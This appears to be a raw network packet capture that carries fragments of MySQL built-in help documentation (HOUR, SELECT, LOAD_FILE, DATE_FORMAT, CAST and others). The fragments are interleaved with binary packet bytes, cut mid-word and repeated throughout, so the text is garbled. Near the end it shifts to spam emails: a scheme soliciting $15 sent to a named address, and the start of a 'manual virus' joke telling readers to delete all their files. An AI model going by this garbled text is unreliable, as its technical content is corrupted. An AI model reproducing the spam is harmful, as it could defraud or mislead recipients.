MBRContains(@g1,@g2), MBRContains(@g2,@g1);\n----------------------+----------------------+\n| MBRContains(@g1,@g2) | MBRContains(@g2,@g1) |\n+----------------------+----------------------+\n| 1 | 0 |\n+----------------------+----------------------+',''),(279,'HOUR',14,' HOUR(time)\nReturns the hour for time. The range of the return value is\n0 to 23 for time-of-day values.\n','mysql> SELECT HOUR(\'10:05:03\');\n -> 10',''),(280,'TYPE SET',1,' SET(\'value1\',\'value2\',...)\n\nA set. A string object that can have zero or more values, each of which must\nbe chosen from the list of values \'value1\', \'value2\',\n... A SET column can have a maximum of 64 members.\nSET values are represented internaC ZZBi0`EL@/܂Sŀo0E4@? 3 Pb,b) )XC ZZ0`BiEL@/go0AE4@@ 3 Pb,b) )XC ZZBi0`EL@/Ao0E4@?  ֞Pg%"l+ dmRC ZZ0`BiEL@/o0˃2E4@@  ֞Pg%"l+ dmRC^ bbBi0`ET@/p܂Ao0E<{@?  3P%  )Glly as integers.\n \n','',''),(281,'SELECT',6,'SELECT is used to retrieve rows selected from one or more tables.\nSupport for UNION statements and subqueries is available as of MySQL\n4.0 and 4.1, respectively.\nSee [UNION, , UNION] and [Subqueries].\n\n --- Each select_expr indicates a column you want to retrieve.\n\n --- table_references indicates the table or tables from which to retrieve rows.\nIts syntax is described in [JOIN, , JOIN].\n\n --- where_definition consists of the keyword WHERE followed by\nan expression that indicates the condition or conditions that rows\nmust satisfy to be selected.\n\n\nSELECT can also be used to retrieve rows computed without reference to\nany table.\n','SELECT\n [ALL | DISTINCT | DISTINCTROW ]\n [HIGH_PRIORITY]\n [STRAIGHT_JOIN]\n [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]\n [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]\n select_expr, ...\n [INTO OUTFILE \'file_name\' export_options\n | INTO DUMPFILE \'file_name\']\n [FROM table_references\n [WHERE where_definition]\n [GROUP BY {col_name | expr | position}\n [ASC | DESC], ... [WITH ROLLUP]]\n [HAVING where_definition]\n [ORDER BY {col_name | expr | position}\n [ASC | DESC] , ...]\n [LICy bb0`BiET@/Ԁo0SE<{@@  3P%  )Glly as integers.\n \n','',''),(281,'SELECT',6,'SELECT is used to retrieve rows selected from one or more tables.\nSupport for UNION statements and subqueries is available as of MySQL\n4.0 and 4.1, respectively.\nSee [UNION, , UNION] and [Subqueries].\n\n --- Each select_expr indicates a column you want to retrieve.\n\n --- table_references indicates the table or tables from which to retrieve rows.\nIts syntax is described in [JOIN, , JOIN].\n\n --- where_definition consists of the keyword WHERE followed by\nan expression that indicates the condition or conditions that rows\nmust satisfy to be selected.\n\n\nSELECT can also be used to retrieve rows computed without reference to\nany table.\n','SELECT\n [ALL | DISTINCT | DISTINCTROW ]\n [HIGH_PRIORITY]\n [STRAIGHT_JOIN]\n [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]\n [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]\n select_expr, ...\n [INTO OUTFILE \'file_name\' export_options\n | INTO DUMPFILE \'file_name\']\n [FROM table_references\n [WHERE where_definition]\n [GROUP BY {col_name | expr | position}\n [ASC | DESC], ... [WITH ROLLUP]]\n [HAVING where_definition]\n [ORDER BY {col_name | expr | position}\n [ASC | DESC] , ...]\n [LIC bbBi0`ET@/p܂Ao0E<|@?  3P* K )GMIT {[offset,] row_count | row_count OFFSET offset}]\n [PROCEDURE procedure_name(argument_list)]\n [FOR UPDATE | LOCK IN SHARE MODE]]',''),(282,'COT',4,' COT(X)\nReturns the cotangent of X.\n','mysql> SELECT COT(12);\n -> -1.57267341\nmysql> SELECT COT(0);\n -> NULL',''),(283,'BACKUP TABLE',7,'Note: This statement is deprecated. We are working on a better\nreplacement for it that will provide online backup capabilities.\nIn the meantime, the mysqlhotcopy script can be used instead.\n\nBACKUP TABLE copies to the backup directory the minimum number of\ntable files needed to restore the table, after flushing any buffered changes\nto disk. The statement works only for MyISAM tables. It copies the\n*.frm definition and *.MYD data files. The *.MYI\nindex file can be rebuilt from those two files.\nThe directory should be specified as a full pathname.\n','BACKUP TABLE tbl_name [, tbl_name] ... TO \'/path/to/backup/directory\'',''),(284,'LOAD_FILE',23,' LOAD_FILE(file_name)\nReads the file and returns the file contents as a string. The file\nmust be located on the server, you must specify the full pathname to the\nfile, and you must have the FILE privilege. The file must\nbe readable by all and be smaller than max_allowed_packet bytes.\n\nIf theC ZZBi0`EL@/Plo0E4/~@?  3P;E c y)HC __Bi0`EQ@/a SELECT COT(12);\n -> -1.57267341\nmysql> SELECT COT(0);\n -> NULL',''),(283,'BACKUP TABLE',7,'Note: This statement is deprecated. We are working on a better\nreplacement for it that will provide online backup capabilities.\nIn the meantime, the mysqlhotcopy script can be used instead.\n\nBACKUP TABLE copies to the backup directory the minimum number of\ntable files needed to restore the table, after flushing any buffered changes\nto disk. The statement works only for MyISAM tables. It copies the\n*.frm definition and *.MYD data files. The *.MYI\nindex file can be rebuilt from those two files.\nThe directory should be specified as a full pathname.\n','BACKUP TABLE tbl_name [, tbl_name] ... TO \'/path/to/backup/directory\'',''),(284,'LOAD_FILE',23,' LOAD_FILE(file_name)\nReads the file and returns the file contents as a string. The file\nmust be located on the server, you must specify the full pathname to the\nfile, and you must have the FILE privilege. The file must\nbe readable by all and be smaller than max_allowed_packet bytes.\n\nIf theC ZZ0`BiEL@/܀o0SE4/~@@  3P;E c y)HC __0`BiEQ@/o0AE9@@  PoK$} ŀ  qc[0 C ZZBi0`EL@/Ao0E4@?  ֞Pg%"l dmUC ZZBi0`EL@/܂Sŀo0E4@? 3 Pb6r) )YC ZZBi0`EL@/a qc[C ZZ0`BiEL@/o0˃2E4@@  ֞Pg%"l dmUC ZZ0`BiEL@/go0AE4@@ 3 Pb6r) )YC ZZ0`BiEL@/o0AE4@@  PoK$ ŀ > qc[C" bbBi0`ET@/p܂Ao0E<}@?  3P/ 5 )G file doesn\'t exist or cannot be read because one of the preceding\nconditions is not satisfied, the function returns NULL.\n','mysql> UPDATE tbl_name\n SET blob_column=LOAD_FILE(\'/tmp/picture\')\n WHERE id=1;',''),(285,'POINTFROMTEXT',3,' PointFromText(wkt[,srid])\nConstructs a POINT value using its WKT representation and SRID.\n','',''),(286,'LOAD TABLE FROM MASTER',6,'LOAD TABLE tbl_name FROM MASTER\n\nTransfers a copy of the table from master to the slave. This statement is\nimplemented mainly for debugging of LOAD DATA FROM MASTER.\nIt requires that the account used for connecting to the master server has the\nRELOAD and SUPER privileges on the master and the\nSELECT privilege on the master table to load.\nOn the slave side, the user that issues LOAD TABLE FROM MASTER should\nhave privileges to drop and create the table.\n\nThe conditions for LOAD DATA FROM MASTER apply here, too. For\nexample, LOAD TABLE FROM MASTER works only for MyISAM tables.\nThe timeout notes for LOAD DATA FROM MASTER apply as well.\n','',''),(287,'GROUP_CONCAT',12,' GROUP_CONCAT(expr)\nThis function returns a string result with the concatenated non-NULL\nvalues from a group. It returns NULL if there are no non-NULL\nvalues. The full syntax is as follows:\n\nGROUPC= bb0`BiET@/Ԁo0SE<}@@  3P/ 5 )G file doesn\'t exist or cannot be read because one of the preceding\nconditions is not satisfied, the function returns NULL.\n','mysql> UPDATE tbl_name\n SET blob_column=LOAD_FILE(\'/tmp/picture\')\n WHERE id=1;',''),(285,'POINTFROMTEXT',3,' PointFromText(wkt[,srid])\nConstructs a POINT value using its WKT representation and SRID.\n','',''),(286,'LOAD TABLE FROM MASTER',6,'LOAD TABLE tbl_name FROM MASTER\n\nTransfers a copy of the table from master to the slave. This statement is\nimplemented mainly for debugging of LOAD DATA FROM MASTER.\nIt requires that the account used for connecting to the master server has the\nRELOAD and SUPER privileges on the master and the\nSELECT privilege on the master table to load.\nOn the slave side, the user that issues LOAD TABLE FROM MASTER should\nhave privileges to drop and create the table.\n\nThe conditions for LOAD DATA FROM MASTER apply here, too. For\nexample, LOAD TABLE FROM MASTER works only for MyISAM tables.\nThe timeout notes for LOAD DATA FROM MASTER apply as well.\n','',''),(287,'GROUP_CONCAT',12,' GROUP_CONCAT(expr)\nThis function returns a string result with the concatenated non-NULL\nvalues from a group. It returns NULL if there are no non-NULL\nvalues. The full syntax is as follows:\n\nGROUPC bbBi0`ET@/p܂Ao0E<~@?  3P4  )G_CONCAT([DISTINCT] expr [,expr ...]\n [ORDER BY {unsigned_integer | col_name | expr}\n [ASC | DESC] [,col_name ...]]\n [SEPARATOR str_val])\n','mysql> SELECT student_name,\n -> GROUP_CONCAT(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(288,'DATE_FORMAT',14,' DATE_FORMAT(date,format)\nFormats the date value according to the format string. The\nfollowing specifiers may be used in the format string:\n\n Specifier Description\n %a Abbreviated weekday name (Sun..Sat)\n %b Abbreviated month name (Jan..Dec)\n %c Month, numeric (0..12)\n %D Day of the month with English suffix (0th, 1st, 2nd, 3rd, ...)\n %d Day of the month, numeric (00..31)\n %e Day of the month, numeric (0..31)\n %f Microseconds (000000..999999)\n %H Hour (00..23)\n %h Hour (01..12)\n %I Hour (01..12)\n %i Minutes, numeric (00..59)\n %j Day of year (001..366)\n %k Hour (0..23)\n %l Hour (1..12)\n %M Month name (January..December)\n %m Month, numeric (00..12)\n %p AM or PM\n %r Time, 12-hour (hh:mm:ss followed by AM or PM)\n %S Seconds (00..59)\n %s Seconds (00..59)\n %T Time, 24-hour (hh:mm:ss)\n %U Week (00..53), where Sunday is the fC ZZBi0`EL@/܂Sŀo0E4n@? 3 P't` )ZC ZZBi0`EL@/܂Sŀo0E4@? 3 Pb@) )Z C bb0`BiET@/Ԁo0SE<~@@  3P4  )G_CONCAT([DISTINCT] expr [,expr ...]\n [ORDER BY {unsigned_integer | col_name | expr}\n [ASC | DESC] [,col_name ...]]\n [SEPARATOR str_val])\n','mysql> SELECT student_name,\n -> GROUP_CONCAT(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(288,'DATE_FORMAT',14,' DATE_FORMAT(date,format)\nFormats the date value according to the format string. The\nfollowing specifiers may be used in the format string:\n\n Specifier Description\n %a Abbreviated weekday name (Sun..Sat)\n %b Abbreviated month name (Jan..Dec)\n %c Month, numeric (0..12)\n %D Day of the month with English suffix (0th, 1st, 2nd, 3rd, ...)\n %d Day of the month, numeric (00..31)\n %e Day of the month, numeric (0..31)\n %f Microseconds (000000..999999)\n %H Hour (00..23)\n %h Hour (01..12)\n %I Hour (01..12)\n %i Minutes, numeric (00..59)\n %j Day of year (001..366)\n %k Hour (0..23)\n %l Hour (1..12)\n %M Month name (January..December)\n %m Month, numeric (00..12)\n %p AM or PM\n %r Time, 12-hour (hh:mm:ss followed by AM or PM)\n %S Seconds (00..59)\n %s Seconds (00..59)\n %T Time, 24-hour (hh:mm:ss)\n %U Week (00..53), where Sunday is the fC ZZ0`BiEL@/go0AE4n@@ 3 P't` )ZC ZZ0`BiEL@/go0AE4@@ 3 Pb@) )Z C ZZBi0`EL@/Ao0E4@?  ֞Pg%π"l dmUC ZZ0`BiEL@/o0˃2E4@@  ֞Pg%π"l dmUCf bbBi0`ET@/p܂Ao0E SET @poly = \'Polygon((0 0,0 3,3 0,0 0),(1 1,1 2,2 1,1 1))\';\nmysql> SELECT Area(GeomFromText(@poly));\n+---------------------------+\n| Area(GeomFromText(@poly)) |\n+---------------------------+\n| 4 |\n+---------------------------+',''),(258,'START SLAVE',7,'START SLAVE [thread_type [, thread_type] ... ]\nSTART SLAVE [SQL_THREAD] UNTIL\n MASTER_LOG_FILE = \'log_name\', MASTER_LOG_POS = log_pos\nSTART SLAVE [SQL_THREAD] UNTIL\n RELAY_LOG_FILE = \'log_name\', RELAY_LOG_POS = log_pos\n\nthread_type: IO_THREAD | SQL_THREAD\n\nSTART SLAVE with no options starts both of the slave threads.\nThe I/O thread reads queries from the master server and stores them in the\nrelay log. The SQL thread reads the relay log and executes the\nqueries.\nSTART SLAVE requires the SUPER privilege.\n\nICp ZZBi0`EL@/܂Sŀo0E4\M@?2 3 Pu}Ut$0 )ZC bb0`BiET@/Ԁo0SE SET @poly = \'Polygon((0 0,0 3,3 0,0 0),(1 1,1 2,2 1,1 1))\';\nmysql> SELECT Area(GeomFromText(@poly));\n+---------------------------+\n| Area(GeomFromText(@poly)) |\n+---------------------------+\n| 4 |\n+---------------------------+',''),(258,'START SLAVE',7,'START SLAVE [thread_type [, thread_type] ... ]\nSTART SLAVE [SQL_THREAD] UNTIL\n MASTER_LOG_FILE = \'log_name\', MASTER_LOG_POS = log_pos\nSTART SLAVE [SQL_THREAD] UNTIL\n RELAY_LOG_FILE = \'log_name\', RELAY_LOG_POS = log_pos\n\nthread_type: IO_THREAD | SQL_THREAD\n\nSTART SLAVE with no options starts both of the slave threads.\nThe I/O thread reads queries from the master server and stores them in the\nrelay log. The SQL thread reads the relay log and executes the\nqueries.\nSTART SLAVE requires the SUPER privilege.\n\nIC ZZ0`BiEL@/go0AE4\M@@2 3 Pu}Ut$0 )ZC bbBi0`ET@/p܂Ao0E<@?  3P9 + )Hirst day of the week\n %u Week (00..53), where Monday is the first day of the week\n %V Week (01..53), where Sunday is the first day of the week; used with %X\n %v Week (01..53), where Monday is the first day of the week; used with %x\n %W Weekday name (Sunday..Saturday)\n %w Day of the week (0=Sunday..6=Saturday)\n %X Year for the week where Sunday is the first day of the week, numeric, four digits; used with %V\n %x Year for the week, where Monday is the first day of the week, numeric, four digits; used with %v\n %Y Year, numeric, four digits\n %y Year, numeric, two digits\n %% A literal \'%\'.\n \n\nAll other characters are copied to the result without interpretation.\n\nThe %v, %V, %x, and %X format specifiers are\navailable as of MySQL 3.23.8. %f is available as of MySQL 4.1.1.\n\nAs of MySQL 3.23, the \'%\' character is required before\nformat specifier characters. In earlier versions of MySQL,\n\'%\' was optional.\n\nThe reason the ranges for the month and day specifiers begin with zero\nis that MySQL allows incomplete dates such as \'2004-00-00\' to be\nstored as of MySQL 3.23.\n','mysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%W %M %Y\');\n -> \'Saturday October 1997\'\nmysql> SELECT DATE_FORMAT(\'1997-C ZZBi0`EL@/Plo0E4P@?  Pt Xhr Qr ydC bb0`BiET@/Ԁo0SE<@@  3P9 + )Hirst day of the week\n %u Week (00..53), where Monday is the first day of the week\n %V Week (01..53), where Sunday is the first day of the week; used with %X\n %v Week (01..53), where Monday is the first day of the week; used with %x\n %W Weekday name (Sunday..Saturday)\n %w Day of the week (0=Sunday..6=Saturday)\n %X Year for the week where Sunday is the first day of the week, numeric, four digits; used with %V\n %x Year for the week, where Monday is the first day of the week, numeric, four digits; used with %v\n %Y Year, numeric, four digits\n %y Year, numeric, two digits\n %% A literal \'%\'.\n \n\nAll other characters are copied to the result without interpretation.\n\nThe %v, %V, %x, and %X format specifiers are\navailable as of MySQL 3.23.8. %f is available as of MySQL 4.1.1.\n\nAs of MySQL 3.23, the \'%\' character is required before\nformat specifier characters. In earlier versions of MySQL,\n\'%\' was optional.\n\nThe reason the ranges for the month and day specifiers begin with zero\nis that MySQL allows incomplete dates such as \'2004-00-00\' to be\nstored as of MySQL 3.23.\n','mysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%W %M %Y\');\n -> \'Saturday October 1997\'\nmysql> SELECT DATE_FORMAT(\'1997-C ZZ0`BiEL@/o0AE4P@@  Pt Xhr Qr ydC bbBi0`ET@/p܂Ao0E<@?  3P> a )H10-04 22:23:00\', \'%H:%i:%s\');\n -> \'22:23:00\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%D %y %a %d %m %b %j\');\n -> \'4th 97 Sat 04 10 Oct 277\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%H %k %I %r %T %S %w\');\n -> \'22 22 10 10:23:00 PM 22:23:00 00 6\'\nmysql> SELECT DATE_FORMAT(\'1999-01-01\', \'%X %V\');\n -> \'1998 52\'',''),(289,'BENCHMARK',25,' BENCHMARK(count,expr)\nThe BENCHMARK() function executes the expression expr\nrepeatedly count times. It may be used to time how fast MySQL\nprocesses the expression. The result value is always 0. The intended\nuse is from within the mysql client, which reports query execution times:\n','mysql> SELECT BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\'));\n+----------------------------------------------+\n| BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\')) |\n+----------------------------------------------+\n| 0 |\n+----------------------------------------------+\n1 row in set (4.74 sec)',''),(290,'YEAR',14,' YEAR(date)\nReturns the year for date, in the range 1000 to 9999.\n','mysql> SELECT YEAR(\'98-02-03\');\n -> 1998',''),(291,'SHOW ENGINE',6,'SHOW ENGINEC ZZBi0`EL@/܂Sŀo0E4\O@?0 3 Pu}U)$& )ZC bb0`BiET@/Ԁo0SE<@@  3P> a )H10-04 22:23:00\', \'%H:%i:%s\');\n -> \'22:23:00\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%D %y %a %d %m %b %j\');\n -> \'4th 97 Sat 04 10 Oct 277\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%H %k %I %r %T %S %w\');\n -> \'22 22 10 10:23:00 PM 22:23:00 00 6\'\nmysql> SELECT DATE_FORMAT(\'1999-01-01\', \'%X %V\');\n -> \'1998 52\'',''),(289,'BENCHMARK',25,' BENCHMARK(count,expr)\nThe BENCHMARK() function executes the expression expr\nrepeatedly count times. It may be used to time how fast MySQL\nprocesses the expression. The result value is always 0. The intended\nuse is from within the mysql client, which reports query execution times:\n','mysql> SELECT BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\'));\n+----------------------------------------------+\n| BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\')) |\n+----------------------------------------------+\n| 0 |\n+----------------------------------------------+\n1 row in set (4.74 sec)',''),(290,'YEAR',14,' YEAR(date)\nReturns the year for date, in the range 1000 to 9999.\n','mysql> SELECT YEAR(\'98-02-03\');\n -> 1998',''),(291,'SHOW ENGINE',6,'SHOW ENGINEC ZZ0`BiEL@/go0AE4\O@@0 3 Pu}U)$& )ZC bbBi0`ET@/p܂Ao0E<@?  3PC u )H displays log or status information about storage engines.\nThe following statements currently are supported:\n\nSHOW ENGINE BDB LOGS\nSHOW ENGINE INNODB STATUS\n\nSHOW ENGINE BDB LOGS displays status information about existing\nBDB log files. It returns the following fields:\n\n\n File\nThe full path to the log file.\n\n Type\nThe log file type (BDB for Berkeley DB log files).\n\n Status\nThe status of the log file (FREE if the file can be removed, or\nIN USE if the file is needed by the transaction subsystem)\n\n \n\nSHOW ENGINE INNODB STATUS displays extensive information about the\nstate of the InnoDB storage engine.\n\nOlder (and now deprecated) synonyms for these statements are SHOW [BDB]\nLOGS and SHOW INNODB STATUS.\n\nSHOW ENGINE can be used as of MySQL 4.1.2.\n','SHOW ENGINE engine_name {LOGS | STATUS }',''),(292,'RELEASE_LOCK',21,' RELEASE_LOCK(str)\nReleases the lock named by the string str that was obtained with\nGET_LOCK(). Returns 1 if the lock was released, 0 if the\nlock wasn\'t locked by this thread (in which case the lock is not released),\nand NULL if the named lock didn\'t exist. The lock does not exist if\nit was never obtained by a call to GET_LOCK() or if it has previously\nbeen released.\n\nThe DO statement is convenient to use with C bb0`BiET@/Ԁo0SE<@@  3PC u )H displays log or status information about storage engines.\nThe following statements currently are supported:\n\nSHOW ENGINE BDB LOGS\nSHOW ENGINE INNODB STATUS\n\nSHOW ENGINE BDB LOGS displays status information about existing\nBDB log files. It returns the following fields:\n\n\n File\nThe full path to the log file.\n\n Type\nThe log file type (BDB for Berkeley DB log files).\n\n Status\nThe status of the log file (FREE if the file can be removed, or\nIN USE if the file is needed by the transaction subsystem)\n\n \n\nSHOW ENGINE INNODB STATUS displays extensive information about the\nstate of the InnoDB storage engine.\n\nOlder (and now deprecated) synonyms for these statements are SHOW [BDB]\nLOGS and SHOW INNODB STATUS.\n\nSHOW ENGINE can be used as of MySQL 4.1.2.\n','SHOW ENGINE engine_name {LOGS | STATUS }',''),(292,'RELEASE_LOCK',21,' RELEASE_LOCK(str)\nReleases the lock named by the string str that was obtained with\nGET_LOCK(). Returns 1 if the lock was released, 0 if the\nlock wasn\'t locked by this thread (in which case the lock is not released),\nand NULL if the named lock didn\'t exist. The lock does not exist if\nit was never obtained by a call to GET_LOCK() or if it has previously\nbeen released.\n\nThe DO statement is convenient to use with C bbBi0`ET@/p܂Ao0E<@?  3PH 3 )IRELEASE_LOCK().\nSee also : [DO, , DO].\n','',''),(293,'IS NULL',26,' IS NULL\n IS NOT NULL\nTests whether a value is or is not NULL.\n','mysql> SELECT 1 IS NULL, 0 IS NULL, NULL IS NULL;\n -> 0, 0, 1\nmysql> SELECT 1 IS NOT NULL, 0 IS NOT NULL, NULL IS NOT NULL;\n -> 1, 1, 0',''),(294,'CONVERT_TZ',14,' CONVERT_TZ(dt,from_tz,to_tz)\n\nCONVERT_TZ()\nconverts a datetime value dt from time zone given by from_tz\nto the time zone given by to_tz and returns the resulting value.\nTime zones may be specified as described in [Time zone support].\nThis function returns NULL if the arguments are invalid.\n','mysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'GMT\',\'MET\');\n -> \'2004-01-01 13:00:00\'\nmysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'+00:00\',\'-07:00\');\n -> \'2004-01-01 05:00:00\'',''),(295,'TIME_TO_SEC',14,' TIME_TO_SEC(time)\nReturns the time argument, converted to seconds.\n','mysql> SELECT TIME_TO_SEC(\'22:23:00\');\n -> 80580\nmysql> SELECT TIME_TO_SEC(\'00:39:38\');\n -> 2378',''),(296,'WEEKDAY',14,' WEEKDAY(date)\nReturns the weekday index for\ndate (0 = Monday, 1 = Tuesday, ... 6 = Sunday).\n','mysql> SELECT WEEKDAY(\'1998-02-03 22:23:00\');\n -> 1\nmysql> SELECT WEEKDAY(\'1997-11-05\');\C ZZBi0`EL@/܂Sŀo0E4\Q@?. 3 Pu}U3$ )[C bb0`BiET@/Ԁo0SE<@@  3PH 3 )IRELEASE_LOCK().\nSee also : [DO, , DO].\n','',''),(293,'IS NULL',26,' IS NULL\n IS NOT NULL\nTests whether a value is or is not NULL.\n','mysql> SELECT 1 IS NULL, 0 IS NULL, NULL IS NULL;\n -> 0, 0, 1\nmysql> SELECT 1 IS NOT NULL, 0 IS NOT NULL, NULL IS NOT NULL;\n -> 1, 1, 0',''),(294,'CONVERT_TZ',14,' CONVERT_TZ(dt,from_tz,to_tz)\n\nCONVERT_TZ()\nconverts a datetime value dt from time zone given by from_tz\nto the time zone given by to_tz and returns the resulting value.\nTime zones may be specified as described in [Time zone support].\nThis function returns NULL if the arguments are invalid.\n','mysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'GMT\',\'MET\');\n -> \'2004-01-01 13:00:00\'\nmysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'+00:00\',\'-07:00\');\n -> \'2004-01-01 05:00:00\'',''),(295,'TIME_TO_SEC',14,' TIME_TO_SEC(time)\nReturns the time argument, converted to seconds.\n','mysql> SELECT TIME_TO_SEC(\'22:23:00\');\n -> 80580\nmysql> SELECT TIME_TO_SEC(\'00:39:38\');\n -> 2378',''),(296,'WEEKDAY',14,' WEEKDAY(date)\nReturns the weekday index for\ndate (0 = Monday, 1 = Tuesday, ... 6 = Sunday).\n','mysql> SELECT WEEKDAY(\'1998-02-03 22:23:00\');\n -> 1\nmysql> SELECT WEEKDAY(\'1997-11-05\');\C ZZ0`BiEL@/go0AE4\Q@@. 3 Pu}U3$ )[C bbBi0`ET@/p܂Ao0E<@?  3PMƞ  )In -> 2',''),(297,'EXPORT_SET',23,' EXPORT_SET(bits,on,off[,separator[,number_of_bits]])\nReturns a string in which for every bit set in the value bits, you\nget an on string and for every reset bit you get an off\nstring. Bits in bits are examined from right to left (from low-order\nto high-order bits). Strings are added to the result from left to right,\nseparated by the separator string (default \',\'). The number of\nbits examined is given by number_of_bits (default 64).\n','mysql> SELECT EXPORT_SET(5,\'Y\',\'N\',\',\',4);\n -> \'Y,N,Y,N\'\nmysql> SELECT EXPORT_SET(6,\'1\',\'0\',\',\',10);\n -> \'0,1,1,0,0,0,0,0,0,0\'',''),(298,'TIME FUNCTION',14,' TIME(expr)\n\nExtracts the time part of the time or datetime expression expr.\n','mysql> SELECT TIME(\'2003-12-31 01:02:03\');\n -> \'01:02:03\'\nmysql> SELECT TIME(\'2003-12-31 01:02:03.000123\');\n -> \'01:02:03.000123\'',''),(299,'CAST',23,'The CAST() and CONVERT() functions can be used to take a\nvalue of one type and produce a value of another type.\n\nThe type can be one of the following values:\n\n --- BINARY\n --- CHAR\n --- DATE\n --- DATETIME\n --- SIGNED [INTEGER]\n --- TIME\n --- UNSIGNED [INTEGER]\n\nBINARY produces a binary string. See the entry for the BINARY\noperatC bb0`BiET@/Ԁo0SE<@@  3PMƞ  )In -> 2',''),(297,'EXPORT_SET',23,' EXPORT_SET(bits,on,off[,separator[,number_of_bits]])\nReturns a string in which for every bit set in the value bits, you\nget an on string and for every reset bit you get an off\nstring. Bits in bits are examined from right to left (from low-order\nto high-order bits). Strings are added to the result from left to right,\nseparated by the separator string (default \',\'). The number of\nbits examined is given by number_of_bits (default 64).\n','mysql> SELECT EXPORT_SET(5,\'Y\',\'N\',\',\',4);\n -> \'Y,N,Y,N\'\nmysql> SELECT EXPORT_SET(6,\'1\',\'0\',\',\',10);\n -> \'0,1,1,0,0,0,0,0,0,0\'',''),(298,'TIME FUNCTION',14,' TIME(expr)\n\nExtracts the time part of the time or datetime expression expr.\n','mysql> SELECT TIME(\'2003-12-31 01:02:03\');\n -> \'01:02:03\'\nmysql> SELECT TIME(\'2003-12-31 01:02:03.000123\');\n -> \'01:02:03.000123\'',''),(299,'CAST',23,'The CAST() and CONVERT() functions can be used to take a\nvalue of one type and produce a value of another type.\n\nThe type can be one of the following values:\n\n --- BINARY\n --- CHAR\n --- DATE\n --- DATETIME\n --- SIGNED [INTEGER]\n --- TIME\n --- UNSIGNED [INTEGER]\n\nBINARY produces a binary string. See the entry for the BINARY\noperatC bbBi0`ET@/p܂Ao0E<@?  3PRΞ ) )Ior in this section for a description of how this affects comparisons.\n\nCAST() and CONVERT() are available as of MySQL 4.0.2.\nThe CHAR conversion type is available as of 4.0.6.\nThe USING form of CONVERT() is available as of 4.1.0.\n\nCAST() and CONVERT(... USING ...) are standard SQL syntax.\nThe non-USING form of CONVERT() is ODBC syntax.\n\nCONVERT() with USING is used to convert data between different\ncharacter sets. In MySQL, transcoding names are the same as the\ncorresponding character set names. For example, this statement converts\nthe string \'abc\' in the server\'s default character set to the\ncorresponding string in the utf8 character set:\n\nSELECT CONVERT(\'abc\' USING utf8);\n\n \n\nThe cast functions are useful when you want to create a column with\na specific type in a CREATE ... SELECT statement:\n','SELECT enum_col FROM tbl_name ORDER BY CAST(enum_col AS CHAR);',''),(300,'SOUNDS LIKE',23,' expr1 SOUNDS LIKE expr2\n\nThis is the same as SOUNDEX(expr1) = SOUNDEX(expr2). It is\navailable only in MySQL 4.1 or later.\n','',''),(301,'PERIOD_DIFF',14,' PERIOD_DIFF(P1,P2)\nReturns the number of months between periods P1 and P2.\nP1 and P2 should be in the format YYMM or YYYYMM.\nNote that the period arguments P1 and P2 are /not/\ndate values.\n',C9 bb0`BiET@/Ԁo0SE<@@  3PRΞ ) )Ior in this section for a description of how this affects comparisons.\n\nCAST() and CONVERT() are available as of MySQL 4.0.2.\nThe CHAR conversion type is available as of 4.0.6.\nThe USING form of CONVERT() is available as of 4.1.0.\n\nCAST() and CONVERT(... USING ...) are standard SQL syntax.\nThe non-USING form of CONVERT() is ODBC syntax.\n\nCONVERT() with USING is used to convert data between different\ncharacter sets. In MySQL, transcoding names are the same as the\ncorresponding character set names. For example, this statement converts\nthe string \'abc\' in the server\'s default character set to the\ncorresponding string in the utf8 character set:\n\nSELECT CONVERT(\'abc\' USING utf8);\n\n \n\nThe cast functions are useful when you want to create a column with\na specific type in a CREATE ... SELECT statement:\n','SELECT enum_col FROM tbl_name ORDER BY CAST(enum_col AS CHAR);',''),(300,'SOUNDS LIKE',23,' expr1 SOUNDS LIKE expr2\n\nThis is the same as SOUNDEX(expr1) = SOUNDEX(expr2). It is\navailable only in MySQL 4.1 or later.\n','',''),(301,'PERIOD_DIFF',14,' PERIOD_DIFF(P1,P2)\nReturns the number of months between periods P1 and P2.\nP1 and P2 should be in the format YYMM or YYYYMM.\nNote that the period arguments P1 and P2 are /not/\ndate values.\n',C bbBi0`ET@/أ  o0E< @?}  3PZ{ U `$)"ort on this process I have developed and did some research on how to get this information around to the right people. I\'ve contacted many spammers and did some price research, what better way to find the Spam haters then to find the spammer that is spamming them. I\'ve talked to many well known bulkers as they like to be called and we made the agreement that I will get to advertise to there list in return for a profit break. I\'m forced to sell my report for the reason to pay the advertising fee and keep me alive but on the bright side you will learn to fight against the horrible porn mail in your email box. Please join me in fighting this horrible advertising method that has been on the Internet for years. Remember, \'Together we stand, divided we fall.\' To order my detailed report and provide your help in fighting spam send $15 to the address below and lets all, together, put a stop to spam once and for all. K.C. Smith 10 East Louisiana Evansville, IN 47711 Thank you for your support in this matter. Your friend and best man in fight against spam.',43),(4,'yLd','DEAR RECEIVER, You have just received a Taliban virus. Since we are not so technologicaly advanced in Afghanistan, this is a MANUAL virus. Please delete all the files on your hard disk yourself and send tC bb0`BiET@/Ԁo0SE< @@}  3PZ{ U `$)"ort on this process I have developed and did some research on how to get this information around to the right people. I\'ve contacted many spammers and did some price research, what better way to find the Spam haters then to find the spammer that is spamming them. I\'ve talked to many well known bulkers as they like to be called and we made the agreement that I will get to advertise to there list in return for a profit break. I\'m forced to sell my report for the reason to pay the advertising fee and keep me alive but on the bright side you will learn to fight 